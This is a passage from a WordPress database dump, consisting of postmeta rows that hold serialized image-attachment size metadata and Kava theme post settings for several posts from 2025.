ge/jpeg\";s:8:\"filesize\";i:226860;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:32:\"New-for-yesterday-1600x1080.jpeg\";s:5:\"width\";i:1600;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:501790;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:30:\"New-for-yesterday-600x503.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:503;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:103789;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:30:\"New-for-yesterday-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:136364;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:31:\"New-for-yesterday-1280x640.jpeg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:231944;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(36911,5436,'_wp_old_date','2025-05-27'),(36912,5436,'_thumbnail_id','5438'),(36913,5436,'_edit_last','38'),(36914,5436,'kava_extra_enable_breadcrumbs','inherit'),(36915,5436,'post_formats',''),(36916,5436,'gallery_tab',''),(36917,5436,'kava_extra_gallery_images',''),(36918,5436,'link_tab',''),(36919,5436,'kava_extra_link',''),(36920,5436,'kava_extra_link_target','_blank'),(36921,5436,'quote_tab',''),(36922,5436,'kava_extra_quote_text',''),(36923,5436,'kava_extra_quote_cite',''),(36924,5436,'audio_tab',''),(36925,5436,'kava_extra_audio',''),(36926,5436,'kava_extra_audio_loop','false'),(36927,5436,'kava_extra_audio_autoplay','false'),(36928,5436,'kava_extra_audio_preload','false'),(36929,5436,'video_tab',''),(36930,5436,'kava_extra_video_type','library'),(36931,5436,'kava_extra_video_library',''),(36932,5436,'kava_extra_video_external',''),(36933,5436,'kava_extra_video_poster',''),(36934,5436,'kava_extra_video_width','770'),(36935,5436,'kava_extra_video_height','480'),(36936,5436,'kava_extra_video_loop','false'),(36937,5436,'kava_extra_video_autoplay','false'),(36938,5436,'kava_extra_video_preload','false'),(36939,5441,'_edit_lock','1748969711:38'),(36940,5441,'_last_editor_used_jetpack','block-editor'),(36941,5442,'_wp_attached_file','2025/06/New-today1.jpeg'),(36942,5442,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:1200;s:4:\"file\";s:23:\"2025/06/New-today1.jpeg\";s:8:\"filesize\";i:244868;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"New-today1-300x225.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20176;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"New-today1-1024x768.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:131266;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"New-today1-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8353;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"New-today1-768x576.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:85727;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:25:\"New-today1-1536x1152.jpeg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:235896;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"New-today1-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27051;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:22:\"New-today1-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5682;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:23:\"New-today1-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16217;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:23:\"New-today1-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38525;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:23:\"New-today1-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40804;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:23:\"New-today1-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56641;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:24:\"New-today1-1170x650.jpeg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:127141;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:25:\"New-today1-1600x1080.jpeg\";s:5:\"width\";i:1600;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:253271;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:23:\"New-today1-600x450.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:59704;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:23:\"New-today1-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77141;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:24:\"New-today1-1280x640.jpeg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:131282;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(36945,5441,'_thumbnail_id','5442'),(36946,5441,'_edit_last','38'),(36947,5441,'kava_extra_enable_breadcrumbs','inherit'),(36948,5441,'post_formats',''),(36949,5441,'gallery_tab',''),(36950,5441,'kava_extra_gallery_images',''),(36951,5441,'link_tab',''),(36952,5441,'kava_extra_link',''),(36953,5441,'kava_extra_link_target','_blank'),(36954,5441,'quote_tab',''),(36955,5441,'kava_extra_quote_text',''),(36956,5441,'kava_extra_quote_cite',''),(36957,5441,'audio_tab',''),(36958,5441,'kava_extra_audio',''),(36959,5441,'kava_extra_audio_loop','false'),(36960,5441,'kava_extra_audio_autoplay','false'),(36961,5441,'kava_extra_audio_preload','false'),(36962,5441,'video_tab',''),(36963,5441,'kava_extra_video_type','library'),(36964,5441,'kava_extra_video_library',''),(36965,5441,'kava_extra_video_external',''),(36966,5441,'kava_extra_video_poster',''),(36967,5441,'kava_extra_video_width','770'),(36968,5441,'kava_extra_video_height','480'),(36969,5441,'kava_extra_video_loop','false'),(36970,5441,'kava_extra_video_autoplay','false'),(36971,5441,'kava_extra_video_preload','false'),(36974,5448,'_edit_lock','1749644761:38'),(36975,5448,'_last_editor_used_jetpack','block-editor'),(36976,5449,'_edit_lock','1750162397:38'),(36977,5449,'_last_editor_used_jetpack','block-editor'),(36978,5450,'_wp_attached_file','2025/06/ED-pic-e1750162298723.jpeg'),(36979,5450,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:960;s:6:\"height\";i:1132;s:4:\"file\";s:34:\"2025/06/ED-pic-e1750162298723.jpeg\";s:8:\"filesize\";i:142780;s:5:\"sizes\";a:15:{s:6:\"medium\";a:5:{s:4:\"file\";s:34:\"ED-pic-e1750162298723-254x300.jpeg\";s:5:\"width\";i:254;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16733;}s:5:\"large\";a:5:{s:4:\"file\";s:35:\"ED-pic-e1750162298723-868x1024.jpeg\";s:5:\"width\";i:868;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:117586;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:34:\"ED-pic-e1750162298723-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6662;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:34:\"ED-pic-e1750162298723-768x906.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:906;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96603;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:34:\"ED-pic-e1750162298723-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20017;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:33:\"ED-pic-e1750162298723-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4225;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:34:\"ED-pic-e1750162298723-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12643;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:34:\"ED-pic-e1750162298723-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29393;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:34:\"ED-pic-e1750162298723-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33341;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:34:\"ED-pic-e1750162298723-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42684;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:34:\"ED-pic-e1750162298723-960x650.jpeg\";s:5:\"width\";i:960;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:84030;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:35:\"ED-pic-e1750162298723-960x1080.jpeg\";s:5:\"width\";i:960;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:139552;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:34:\"ED-pic-e1750162298723-600x708.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:708;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:66115;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:34:\"ED-pic-e1750162298723-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61981;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:34:\"ED-pic-e1750162298723-960x640.jpeg\";s:5:\"width\";i:960;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:84123;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(36982,5449,'_thumbnail_id','5450'),(36983,5449,'_edit_last','38'),(36984,5449,'kava_extra_enable_breadcrumbs','inherit'),(36985,5449,'post_formats',''),(36986,5449,'gallery_tab',''),(36987,5449,'kava_extra_gallery_images',''),(36988,5449,'link_tab',''),(36989,5449,'kava_extra_link',''),(36990,5449,'kava_extra_link_target','_blank'),(36991,5449,'quote_tab',''),(36992,5449,'kava_extra_quote_text',''),(36993,5449,'kava_extra_quote_cite',''),(36994,5449,'audio_tab',''),(36995,5449,'kava_extra_audio',''),(36996,5449,'kava_extra_audio_loop','false'),(36997,5449,'kava_extra_audio_autoplay','false'),(36998,5449,'kava_extra_audio_preload','false'),(36999,5449,'video_tab',''),(37000,5449,'kava_extra_video_type','library'),(37001,5449,'kava_extra_video_library',''),(37002,5449,'kava_extra_video_external',''),(37003,5449,'kava_extra_video_poster',''),(37004,5449,'kava_extra_video_width','770'),(37005,5449,'kava_extra_video_height','480'),(37006,5449,'kava_extra_video_loop','false'),(37007,5449,'kava_extra_video_autoplay','false'),(37008,5449,'kava_extra_video_preload','false'),(37010,5450,'_wp_attachment_backup_sizes','a:16:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:960;s:6:\"height\";i:1280;s:4:\"file\";s:11:\"ED-pic.jpeg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:19:\"ED-pic-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6647;}s:11:\"medium-orig\";a:5:{s:4:\"file\";s:19:\"ED-pic-225x300.jpeg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15292;}s:17:\"medium_large-orig\";a:5:{s:4:\"file\";s:20:\"ED-pic-768x1024.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:110190;}s:10:\"large-orig\";a:5:{s:4:\"file\";s:20:\"ED-pic-768x1024.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:110190;}s:19:\"post-thumbnail-orig\";a:5:{s:4:\"file\";s:19:\"ED-pic-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19884;}s:17:\"kava-thumb-s-orig\";a:5:{s:4:\"file\";s:18:\"ED-pic-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4183;}s:19:\"kava-thumb-s-2-orig\";a:5:{s:4:\"file\";s:19:\"ED-pic-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12411;}s:17:\"kava-thumb-m-orig\";a:5:{s:4:\"file\";s:19:\"ED-pic-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29380;}s:26:\"kava-thumb-m-vertical-orig\";a:5:{s:4:\"file\";s:19:\"ED-pic-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34713;}s:19:\"kava-thumb-m-2-orig\";a:5:{s:4:\"file\";s:19:\"ED-pic-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42404;}s:17:\"kava-thumb-l-orig\";a:5:{s:4:\"file\";s:19:\"ED-pic-960x650.jpeg\";s:5:\"width\";i:960;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:85946;}s:18:\"kava-thumb-xl-orig\";a:5:{s:4:\"file\";s:20:\"ED-pic-960x1080.jpeg\";s:5:\"width\";i:960;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:143450;}s:23:\"kava-thumb-masonry-orig\";a:5:{s:4:\"file\";s:19:\"ED-pic-600x800.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75255;}s:23:\"kava-thumb-justify-orig\";a:5:{s:4:\"file\";s:19:\"ED-pic-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62060;}s:25:\"kava-thumb-justify-2-orig\";a:5:{s:4:\"file\";s:19:\"ED-pic-960x640.jpeg\";s:5:\"width\";i:960;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77507;}}'),(37013,5453,'_edit_lock','1750284896:38'),(37014,5453,'_last_editor_used_jetpack','block-editor'),(37015,5454,'_edit_lock','1750747923:38'),(37016,5454,'_last_editor_used_jetpack','block-editor'),(37017,5455,'_wp_attached_file','2025/06/project_20250619_1019196-01.png'),(37018,5455,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1080;s:6:\"height\";i:611;s:4:\"file\";s:39:\"2025/06/project_20250619_1019196-01.png\";s:8:\"filesize\";i:844247;s:5:\"sizes\";a:12:{s:6:\"medium\";a:5:{s:4:\"file\";s:39:\"project_20250619_1019196-01-300x170.png\";s:5:\"width\";i:300;s:6:\"height\";i:170;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:101387;}s:5:\"large\";a:5:{s:4:\"file\";s:40:\"project_20250619_1019196-01-1024x579.png\";s:5:\"width\";i:1024;s:6:\"height\";i:579;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:785307;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:39:\"project_20250619_1019196-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:47783;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:39:\"project_20250619_1019196-01-768x434.png\";s:5:\"width\";i:768;s:6:\"height\";i:434;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:491401;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:39:\"project_20250619_1019196-01-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:176588;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:38:\"project_20250619_1019196-01-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:29833;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:39:\"project_20250619_1019196-01-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:99267;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:39:\"project_20250619_1019196-01-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:251103;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:39:\"project_20250619_1019196-01-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:273590;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:39:\"project_20250619_1019196-01-570x450.png\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:388905;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:39:\"project_20250619_1019196-01-600x339.png\";s:5:\"width\";i:600;s:6:\"height\";i:339;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:328349;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:39:\"project_20250619_1019196-01-640x611.png\";s:5:\"width\";i:640;s:6:\"height\";i:611;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:512391;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(37021,5454,'_thumbnail_id','5455'),(37022,5454,'_edit_last','38'),(37023,5454,'kava_extra_enable_breadcrumbs','inherit'),(37024,5454,'post_formats',''),(37025,5454,'gallery_tab',''),(37026,5454,'kava_extra_gallery_images',''),(37027,5454,'link_tab',''),(37028,5454,'kava_extra_link',''),(37029,5454,'kava_extra_link_target','_blank'),(37030,5454,'quote_tab',''),(37031,5454,'kava_extra_quote_text',''),(37032,5454,'kava_extra_quote_cite',''),(37033,5454,'audio_tab',''),(37034,5454,'kava_extra_audio',''),(37035,5454,'kava_extra_audio_loop','false'),(37036,5454,'kava_extra_audio_autoplay','false'),(37037,5454,'kava_extra_audio_preload','false'),(37038,5454,'video_tab',''),(37039,5454,'kava_extra_video_type','library'),(37040,5454,'kava_extra_video_library',''),(37041,5454,'kava_extra_video_external',''),(37042,5454,'kava_extra_video_poster',''),(37043,5454,'kava_extra_video_width','770'),(37044,5454,'kava_extra_video_height','480'),(37045,5454,'kava_extra_video_loop','false'),(37046,5454,'kava_extra_video_autoplay','false'),(37047,5454,'kava_extra_video_preload','false'),(37048,5457,'_edit_lock','1750783696:38'),(37049,5457,'_last_editor_used_jetpack','block-editor'),(37050,5458,'_wp_attached_file','2025/06/WhatsApp-Image-2025-06-23-at-12.20.20-1.jpeg'),(37051,5458,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:576;s:4:\"file\";s:52:\"2025/06/WhatsApp-Image-2025-06-23-at-12.20.20-1.jpeg\";s:8:\"filesize\";i:105353;s:5:\"sizes\";a:11:{s:6:\"medium\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2025-06-23-at-12.20.20-1-300x169.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16854;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2025-06-23-at-12.20.20-1-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8168;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2025-06-23-at-12.20.20-1-768x432.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77637;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2025-06-23-at-12.20.20-1-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28170;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:51:\"WhatsApp-Image-2025-06-23-at-12.20.20-1-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5695;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2025-06-23-at-12.20.20-1-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16698;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2025-06-23-at-12.20.20-1-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40389;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2025-06-23-at-12.20.20-1-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:44462;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2025-06-23-at-12.20.20-1-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61293;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2025-06-23-at-12.20.20-1-600x338.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52421;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:52:\"WhatsApp-Image-2025-06-23-at-12.20.20-1-640x576.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78734;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(37052,5459,'_wp_attached_file','2025/06/Template.png'),(37053,5459,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1189;s:6:\"height\";i:740;s:4:\"file\";s:20:\"2025/06/Template.png\";s:8:\"filesize\";i:1538904;s:5:\"sizes\";a:14:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"Template-300x187.png\";s:5:\"width\";i:300;s:6:\"height\";i:187;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:110979;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"Template-1024x637.png\";s:5:\"width\";i:1024;s:6:\"height\";i:637;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:940710;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"Template-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:50526;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"Template-768x478.png\";s:5:\"width\";i:768;s:6:\"height\";i:478;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:577188;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"Template-370x265.png\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:188884;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:19:\"Template-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:29717;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:20:\"Template-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:108333;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:20:\"Template-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:284903;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:20:\"Template-370x500.png\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:317654;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:20:\"Template-570x450.png\";s:5:\"width\";i:570;s